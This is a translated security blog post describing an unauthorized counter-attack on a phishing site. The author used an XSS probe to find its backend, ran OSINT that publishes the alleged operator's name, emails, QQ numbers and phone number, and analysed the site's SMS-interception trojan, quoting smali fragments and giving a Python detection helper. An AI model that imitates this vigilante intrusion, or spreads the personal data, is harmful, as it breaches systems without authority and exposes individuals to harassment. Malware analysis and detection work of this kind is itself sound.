
Chronicle of a Phishing Site's Demise

admin 2019-05-18 173 views, 0 comments

The cause was simple: it all started with one SMS sent from a fake base station. [Target site: http://www.XXXXXlb.com]

0X01 Penetration



Homepage of the phishing site



The phishing site's phishing page



Dropped a snippet of XSS into the form to see what happens.

After a while, the XSS platform received the callback data and with it the backend address [http://www.XXXXXlb.com/houtai987].



The app the site asks you to download is an SMS-interception trojan; we will take a look at it in a moment.



There is quite a lot of data in the backend...





I did a simple tidy-up of the data.



Since it involves personal privacy and the safety of people's funds, I will not provide samples or the source files.

0X02 Social engineering

First, a reverse WHOIS lookup on the domain showed that 28 domains had been registered with the mailbox f-sz@foxmail.com.





During the investigation two more mailboxes turned up, f-sz@qq.com and fengshizhou@vip.qq.com. Of these, f-sz@qq.com had registered 7 domains, and the registrant name was confirmed as 冯仕周.




fengshizhou@vip.qq.com had registered a total of 64 domains.



A reverse lookup on the name 冯仕周 also turned up more than 20 registered domains.





Two further addresses surfaced, 179803590@qq.com and chl80sy@163.com; since the follow-on domains and the QQ numbers and mailboxes involved are too numerous, I will not go into them further.

0X03 Analysis of the interception trojan

Tools required: Android Killer 1.31

Environment setup:

1. Required software: JAVA_JDK

   Android Killer 1.31

2. After installing the JDK, go to Computer (My Computer) → Properties, then follow the screenshot.



Then create three new variables: JAVA_HOME, CLASSPATH and Path.

The variables are set as follows:

• JAVA_HOME: C:\Program Files\Java\jdkxxxxxx [this is your JDK install path; just point it at the JDK root directory]

• CLASSPATH: .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;

• Path: ;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;

3. Run Android Killer


Open our sample [the interception trojan].

App permissions & info

Name: 中国移动兑换客户端 ("China Mobile Redemption Client")
Package name: com.noticessk.w.q.aerosp
Entry point: com.phone2.stop.activity.MainActivity
Version info: Ver:5.5.365(98) SDK:8 TargetSDK:19
Permissions:

• android.permission.RECEIVE_WAP_PUSH // allows the app to receive WAP messages
• android.permission.RECEIVE_BOOT_COMPLETED // auto-start on boot
• android.permission.MODIFY_AUDIO_SETTINGS // change audio settings
• android.permission.WRITE_EXTERNAL_STORAGE // write/read the SD card
• android.permission.RECEIVE_USER_PRESENT // read contact information
• android.permission.READ_CONTACTS // read contact information
• android.permission.INTERNET // network (allows network access)
• android.permission.READ_PHONE_STATE // read phone information (IMEI and the like)
• android.permission.READ_SMS // read SMS/MMS
• android.permission.WRITE_SETTINGS // modify global system settings
• android.permission.VIBRATE // control the vibrator
• android.permission.RECEIVE_SMS // receive SMS
• android.permission.ACCESS_NETWORK_STATE // check network state
• android.permission.GET_TASKS // retrieve running programs
• android.permission.WRITE_SMS // write SMS
• android.permission.SEND_SMS // send SMS
• android.permission.ACCESS_WIFI_STATE // check Wi-Fi state


Because this app requests far too many permissions [even device-administrator rights], we have to dig further.

So what does the app do with all these permissions? Let's continue the analysis. Look at the code below (location: smali\com\phone\stop\db\a.smali).

```smali
    return-void
.end method

.method public d()Ljava/lang/String;
    .locals 3

    iget-object v0, p0, Lcom/phone/stop/db/a;->b:Landroid/content/SharedPreferences;
    const-string v1, "a100"
    const-string v2, "15605364232"   # a phone number appears here!
    invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
    move-result-object v0
    return-object v0
```

It requests device-administrator rights to protect itself [so the user (victim) cannot uninstall it]:

```smali
    move-result v0
    if-nez v0, :cond_0

    new-instance v0, Landroid/content/Intent;
    const-string v2, "android.app.action.ADD_DEVICE_ADMIN"
    invoke-direct {v0, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
    const-string v2, "android.app.extra.DEVICE_ADMIN"
    invoke-virtual {v0, v2, v1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
    const-string v1, "android.app.extra.ADD_EXPLANATION"
    const-string v2, "\u63d0\u9ad8\u6743\u9650\u83b7\u53d6\u4fdd\u62a4"   # 提高权限获取保护 ("elevate permissions to gain protection")
    invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
    const/4 v1, 0x0
```

Since a phone number appears in the code, we can be fairly sure the app sends private data to that number, and the analysis below confirmed this.

It sends an SMS to 15605364232 reporting whether activation succeeded:

```smali
    invoke-static {p0}, Lcom/phone/stop/db/a;->a(Landroid/content/Context;)Lcom/phone/stop/db/a;
    move-result-object v0
    const/4 v1, 0x1
    invoke-virtual {v0, v1}, Lcom/phone/stop/db/a;->a(Z)V
    const-string v0, "\u6fc0\u6d3b\u6210\u529f"   # 激活成功 ("activation succeeded")
    invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V

    :cond_0
    :goto_0
    const/4 v1, 0x0
    const-wide/16 v2, 0x3e8
    invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->sendEmptyMessageDelayed(IJ)Z
    return-void

    :cond_1
    const-string v0, "\u6fc0\u6d3b\u5931\u8d25"   # 激活失败 ("activation failed")
    invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V
    goto :goto_0
.end method
```

It sends whether installation succeeded, together with the device identifier, system version, phone model and similar information, to 15605364232:

```smali
    move-result-object v0
    new-instance v1, Ljava/lang/StringBuilder;
    const-string v2, "\u8f6f\u4ef6\u5b89\u88c5\u5b8c\u6bd5\n\u8bc6\u522b\u7801:"   # 软件安装完毕\n识别码: ("software installed; identifier:")
    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v0
    move-result-object v0
    const-string v1, ";\n\u7cfb\u7edf\u7248\u672c:"   # 系统版本: ("system version:")
    invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;   # appends the system version
    move-result-object v0
    invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
    const-string v1, "\u578b\u53f7:"   # 型号: ("model:")
    invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v0
    sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
    invoke-static {v1}, Lcom/phone/stop/e/e;->a(Ljava/lang/String;)Ljava/lang/String;
    move-result-object v1
    move-result-object v0
    const-string v1, ";\n\u624b\u673a:"   # 手机: ("phone:", i.e. the handset manufacturer name)
    invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v0
```
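As an added defender-side example (not code from the original post), the triage helper below automates two things the analysis above did by hand: it checks a manifest permission list for the combination that characterises an SMS-interception trojan, and it decodes the `\uXXXX`-escaped const-string literals that smali keeps, so that hard-coded phone numbers and device-admin intents stand out. The permission list and smali lines are constructed excerpts that mirror what the post shows; the rule names and the regexes are my own.

```python
import re

# Constructed excerpt of the permission list the post extracted from the sample's manifest.
SAMPLE_PERMISSIONS = [
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_CONTACTS",
]

# Constructed smali lines mirroring those quoted in the post (same number and strings).
SAMPLE_SMALI = r'''
    const-string v1, "a100"
    const-string v2, "15605364232"
    const-string v2, "android.app.action.ADD_DEVICE_ADMIN"
    const-string v2, "\u63d0\u9ad8\u6743\u9650\u83b7\u53d6\u4fdd\u62a4"
    const-string v0, "\u6fc0\u6d3b\u6210\u529f"
'''

# Any one permission in a rule meets it; all three rules together = SMS-stealer profile.
SMS_STEALER_RULES = {
    "intercept": {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"},
    "exfil_sms": {"android.permission.SEND_SMS"},
    "persist": {"android.permission.RECEIVE_BOOT_COMPLETED"},
}

CONST_STRING_RE = re.compile(r'const-string\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')
CN_MOBILE_RE = re.compile(r"^1[3-9]\d{9}$")  # 11-digit mainland China mobile number

def permission_findings(perms):
    """Names of the SMS-stealer rules this permission set satisfies (all three = high confidence)."""
    present = set(perms)
    return sorted(name for name, any_of in SMS_STEALER_RULES.items() if any_of & present)

def decode_smali_string(literal):
    """Turn the \\uXXXX escapes smali keeps inside const-string literals back into text."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), literal)

def suspicious_strings(smali_text):
    """Extract and decode const-string literals, tagging the ones an analyst should read first."""
    hits = []
    for m in CONST_STRING_RE.finditer(smali_text):
        decoded = decode_smali_string(m.group(1))
        if CN_MOBILE_RE.match(decoded):
            hits.append(("phone_number", decoded))  # hard-coded exfiltration target
        elif "DEVICE_ADMIN" in decoded:
            hits.append(("device_admin", decoded))  # self-protection via device admin
        elif decoded != m.group(1):
            hits.append(("decoded_text", decoded))  # escaped UI/SMS text worth reading
    return hits
```

Run `suspicious_strings` over the whole `smali/` tree of a decompiled sample rather than a single excerpt; a phone-number literal next to SEND_SMS-related calls is the fastest confirmation of an SMS stealer.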

0X04 Summary

With that, the phishing-site operator's basic information is in hand:

Name: 冯X周

Phone: 1XXX5364232

QQ: 179XXX590

Frequently used mailboxes: f-sz@qq.com, fengshizhou@vip.qq.com, f-sz@foxmail.com, 179803590@qq.com, chl80sy@163.com

Author: Sp4ce; reposted from: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=10283&ctid=127
